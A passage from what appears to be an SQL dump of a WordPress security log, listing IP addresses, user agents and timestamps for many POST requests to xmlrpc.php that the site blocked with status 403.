Safari\\/537.36\"}','cbuXKhWjemtivH05sdlVRyGY',0,1681240282.8599,627,'','POST',403,0,515,0,1,'',0),('68.178.145.107',1152553323,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','1drj4convkgIZF9p6syViQX0',0,1681240282.1244,746,'','POST',403,0,515,0,1,'',0),('129.226.138.214',2179107542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','toJU7cXArB3R6l8CpbkOzNPI',0,1681240277.2344,579,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','bR7jk6NupdLD2HwP1nMTXyQ4',0,1681240275.4929,579,'','POST',403,0,515,0,1,'',0),('180.235.151.165',3035338661,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','EPJC5TG1BAQl2yYKXwnNuH9L',0,1681240276.3974,562,'','POST',403,0,515,0,1,'',0),('129.226.138.214',2179107542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','g5ZFMnIyGdzu4S2N9wBifLXo',0,1681240268.8275,586,'','POST',403,0,515,0,1,'',0),('82.16.21.137',1376785801,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','a9oAEJwM2rOtI7FP48iDXcT1',0,1681240267.9320,555,'','POST',403,0,515,0,1,'',0),('162.14.102.253',2718852861,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','dIrHupzSwKo738OjvehMEi9D',0,1681240265.5653,1318,'','POST',403,0,515,0,1,'',0),('162.240.18.77',2733642317,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','gy2kF0f651PNCdzuDpbwGLMO',0,1681240262.4755,3784,'','POST',403,0,515,0,1,'',0),('5.79.102.66',89089602,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','6mfwOGCxWY2zEJehKSD49BaU',0,1681240262.7367,2526,'','POST',403,0,515,0,1,'',0),('104.254.90.243',1761499891,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','81tPhzefLMBi9D7OZwGj6xgr',0,1681240103.2702,3604,'','POST',403,0,515,0,1,'',0),('74.208.59.242',1255160818,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','KO8UhsVDSgutzqmxF4yZ09iQ',0,1681244030.5338,581,'','POST',403,0,515,0,1,'',0),('178.18.252.235',2987588843,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','z1d5lLRMGwUXgKcqStIEmYHh',0,1681244024.7363,674,'','POST',403,0,515,0,1,'',0),('144.24.39.81',2417502033,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','Mwzofme64uSVkn0HRKcsNiaC',0,1681244023.8695,584,'','POST',403,0,515,0,1,'',0),('198.251.70.49',3338356273,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','fRUKWoEPZjYidsAr4V06C1NS',0,1681244016.5049,568,'','POST',403,0,515,0,1,'',0),('68.178.145.131',1152553347,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','UCXRjWePdVzT5KY27IutJH16',0,1681244014.0420,574,'','POST',403,0,515,0,1,'',0),('91.206.200.117',1540278389,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','OAkKNrmaJVYbsILRyQigfMqo',0,1681244012.7740,550,'','POST',403,0,515,0,1,'',0),('5.22.249.133',85391749,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','P16VCjQ8aeDINkrA4mqOlgzE',0,1681244006.7727,603,'','POST',403,0,515,0,1,'',0),('172.104.50.233',2892509929,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','7xy12h4pdzbUIDJLM9NEcwAS',0,1681244002.0546,553,'','POST',403,0,515,0,1,'',0),('5.188.34.69',96215621,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','Wa4RPCzxrKnQDqFXud2Z5wN0',0,1681243998.4950,1737,'','POST',403,0,515,0,1,'',0),('162.240.222.21',2733694485,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','xwdP7mOWh8SnEIHMCDKuj2Lo',0,1681247204.2895,556,'','POST',403,0,515,0,1,'',0),('103.121.90.183',1736006327,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','KsJ4pcWV05u7StlXPTq9eBxF',0,1681247201.2443,1883,'','POST',403,0,515,0,1,'',0),('207.244.252.195',3488939203,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','lu6gFy4PBfwDN8O5hdTXZUIt',0,1681247200.9707,1899,'','POST',403,0,515,0,1,'',0),('68.178.247.133',1152579461,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','TqikHmtzl8Q9MaUsnhZ7jNB2',0,1681247192.2984,567,'','POST',403,0,515,0,1,'',0),('87.106.229.164',1466623396,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','DeLWuz2t1fErUl6S0dbTZm9g',0,1681247200.5222,1821,'','POST',403,0,515,0,1,'',0),('176.119.210.163',2960642723,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','RgiBGnCXxAVud46fLzqIh0OE',0,1681247189.6480,579,'','POST',403,0,515,0,1,'',0),('185.30.32.163',3105759395,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','pBWUrIdluz4JRnOGwFqva9NY',0,1681247185.3722,1593,'','POST',403,0,515,0,1,'',0),('103.221.221.51',1742593331,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','ZYcb8LJDr9FXNdRAeKpSIzfP',0,1681252437.5991,577,'','POST',403,0,515,0,1,'',0),('67.23.226.46',1125638702,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','NZhwsW7pLk31j2VDnIExeCya',0,1681252436.3984,567,'','POST',403,0,515,0,1,'',0),('188.132.193.93',3162816861,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','J8FgRDMYTpIlSi1AndhrbX64',0,1681252433.0577,546,'','POST',403,0,515,0,1,'',0),('95.216.93.102',1608015206,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','bvFmHLdwCBSZz0aGg17YoWrP',0,1681252427.5745,3218,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','1lWwMU3xTCzQnJ48O75m0FVI',0,1681252427.2249,2850,'','POST',403,0,515,0,1,'',0),('192.99.19.65',3227718465,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','oGieWwgJruVY9RlZvad8NUs2',0,1681251982.4618,572,'','POST',403,0,515,0,1,'',0),('155.94.140.179',2606664883,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','Q5igKrnlz1NSLEfm6ba0UHDJ',0,1681251967.4729,585,'','POST',403,0,515,0,1,'',0),('149.210.196.227',2513618147,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','od7f24NEv5m3a9wjznMCYcTL',0,1681251971.0777,548,'','POST',403,0,515,0,1,'',0),('213.136.93.169',3582483881,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','GBH7kX3Z8VoLxidTJ26qewbn',0,1681251960.6671,1374,'','POST',403,0,515,0,1,'',0),('54.38.197.19',908510483,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','P0QjJw6g8HcZu9aTmStn74RY',0,1681251941.5799,552,'','POST',403,0,515,0,1,'',0),('198.251.70.49',3338356273,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','ma5Ygi2EfrhqIwnsFJyuO6TL',0,1681251956.7308,556,'','POST',403,0,515,0,1,'',0),('136.243.5.53',2297627957,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','TzNmsVukQPlr0aI2f89JwGje',0,1681251929.0727,567,'','POST',403,0,515,0,1,'',0),('185.176.40.67',3115329603,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','78A1Tduvk9BqRmhn5or0JEja',0,1681251920.2287,3813,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','aMJpBnfK7XV98osUuO13DgGP',0,1681251920.5962,2766,'','POST',403,0,515,0,1,'',0),('179.188.51.77',3015455565,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','F01CdGxwPOZST3hmiYADaLuj',0,1681259354.6309,683,'','POST',403,0,515,0,1,'',0),('68.178.247.133',1152579461,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','9AEvNknM3TxwJ4a5ohKsCeFy',0,1681259350.1229,678,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','qz85blVQk1crCgy7AUve4Hax',0,1681259341.4314,2710,'','POST',403,0,515,0,1,'',0),('5.79.102.66',89089602,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','B9mvFlQP02rbiVWygRMSZDKj',0,1681259346.4121,565,'','POST',403,0,515,0,1,'',0),('171.244.61.154',2884910490,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','AbMx75jrq1hcfKX0aGvRnLDz',0,1681259342.1662,1969,'','POST',403,0,515,0,1,'',0),('45.140.185.41',764197161,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','Yw76mnb4hkI0MsKNWaJSc83X',0,1681259227.4591,1194,'','POST',403,0,515,0,1,'',0),('209.126.6.155',3514697371,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','K1TY0GRv5ZDhbPFrgAUX36Qk',0,1681259226.7433,1544,'','POST',403,0,515,0,1,'',0),('198.251.70.49',3338356273,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','sOTBji6qHkShg5KfZEGWy3tL',0,1681259217.9444,609,'','POST',403,0,515,0,1,'',0),('74.208.59.242',1255160818,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','U0OTiVK3qlQMLyS7jRs8exWb',0,1681259212.9529,644,'','POST',403,0,515,0,1,'',0),('91.134.248.211',1535572179,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','y15ZXQ7PzKwDmxlqrG0kVYvp',0,1681259203.9306,697,'','POST',403,0,515,0,1,'',0),('194.233.85.167',3270071719,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','ROiH7wzyAvKqNUG2IQhbTsCD',0,1681259199.8399,642,'','POST',403,0,515,0,1,'',0),('149.210.196.227',2513618147,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','NHDS2RdGXUEBbQ1LVzuk09t7',0,1681259193.5402,615,'','POST',403,0,515,0,1,'',0),('13.65.80.107',222384235,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','ubaI5gfyqA2i6PnWYk3MvJLD',0,1681259190.1236,605,'','POST',403,0,515,0,1,'',0),('69.16.227.57',1158734649,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','st0LjRfDroF6unkb7UeJpNHC',0,1681259188.8810,590,'','POST',403,0,515,0,1,'',0),('198.251.70.49',3338356273,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','FCZLDrj6pbuy4cAYx19EhsR7',0,1681259180.6893,4995,'','POST',403,0,515,0,1,'',0),('43.240.15.66',737152834,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','CchlBsIkjNUtW2uwnJ61AeO3',0,1681262923.0227,612,'','POST',403,0,515,0,1,'',0),('54.36.131.250',908362746,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','zSGbVFoYcIdi5AU72B6u94Zh',0,1681262905.8445,611,'','POST',403,0,515,0,1,'',0),('184.168.98.254',3098043134,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','D4cxA82qr3vln9kPC5pwgd7j',0,1681262901.6614,561,'','POST',403,0,515,0,1,'',0),('74.208.58.108',1255160428,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','Gt5gjqAvU10X2zZxWD8n7mMR',0,1681262900.0265,629,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','DYsk4roHamvFKbcfwizu8jQV',0,1681262889.1494,614,'','POST',403,0,515,0,1,'',0),('142.44.211.18',2385302290,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','UVk9o7iGlYwEgDCQaKfJBm12',0,1681262887.5692,561,'','POST',403,0,515,0,1,'',0),('62.171.174.52',1051438644,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','tzLjpQUFKOT0fxYdugq1I68b',0,1681262879.4022,3852,'','POST',403,0,515,0,1,'',0),('45.67.217.234',759421418,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','gSWVmix3pbRLzqr6ADsI4aej',0,1681262881.1308,1660,'','POST',403,0,515,0,1,'',0),('141.138.169.246',2374674934,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','iLjAgud31NhaRtsOGD406q7l',0,1681265629.8979,640,'','POST',403,0,515,0,1,'',0),('185.30.32.163',3105759395,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','yWD9BjcLwfqTQr8p2vgNGXOA',0,1681265629.1116,562,'','POST',403,0,515,0,1,'',0),('212.90.148.9',3562705929,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','W6Ul9JzagfIo2jTCQYyEprXG',0,1681265625.7388,576,'','POST',403,0,515,0,1,'',0),('103.178.57.232',1739733480,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','gFv1hbeJdRE79jq6ioIQDxU2',0,1681265623.1416,630,'','POST',403,0,515,0,1,'',0),('161.35.232.217',2703485145,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','210K5p7byRLN4gGHjukaATOB',0,1681265617.9995,539,'','POST',403,0,515,0,1,'',0),('79.170.40.175',1336551599,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','JzkhH4laEUWrmdKu3gLC7STF',0,1681265610.3704,567,'','POST',403,0,515,0,1,'',0),('72.167.69.17',1218921745,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','BzudaUFQWCJXP1Mw8tLInvTb',0,1681265616.6862,612,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','dkIJXfKHZGjQnAYWh132qxRi',0,1681265604.3908,622,'','POST',403,0,515,0,1,'',0),('182.50.132.78',3056763982,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','Zte3lOpwoW5qB4yPrK1DQuNi',0,1681271869.9760,609,'','POST',403,0,515,0,1,'',0),('65.21.239.153',1091956633,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','JfG0pudBoZIcHYk3DLXCQy2r',0,1681271862.0310,598,'','POST',403,0,515,0,1,'',0),('94.124.93.44',1585208620,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','IVifPGuyNRm8M4s0pYFOLrtk',0,1681271860.1117,608,'','POST',403,0,515,0,1,'',0),('155.94.140.179',2606664883,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','YiBaVoufWvjmcNC9zL0thIl8',0,1681271840.6358,4445,'','POST',403,0,515,0,1,'',0),('128.204.199.227',2160904163,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','ADYTH65cF4hnRdEC1zQIKewj',0,1681271842.3712,2511,'','POST',403,0,515,0,1,'',0),('185.151.241.152',3113742744,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','Rz5cFqDGjxEMd1P47Qg2XpeS',0,1681271841.0499,3302,'','POST',403,0,515,0,1,'',0),('184.168.115.25',3098047257,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','cqHmBy8uIsP5wzL7QbejNpAh',0,1681268921.0036,627,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','sf5RqOnQmkZ83FWPJ6HzNDyV',0,1681268917.4648,667,'','POST',403,0,515,0,1,'',0),('171.244.61.154',2884910490,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','vQqbVBc5D2ONhGHRWisUw7Mg',0,1681268913.5877,828,'','POST',403,0,515,0,1,'',0),('184.168.115.25',3098047257,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','wBKAfWhqH19c7pdbSsO3yNDC',0,1681268913.0221,851,'','POST',403,0,515,0,1,'',0),('194.4.57.111',3255056751,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','vj81qhFOgBby5TIkfDJcKlZ6',0,1681268906.8315,624,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 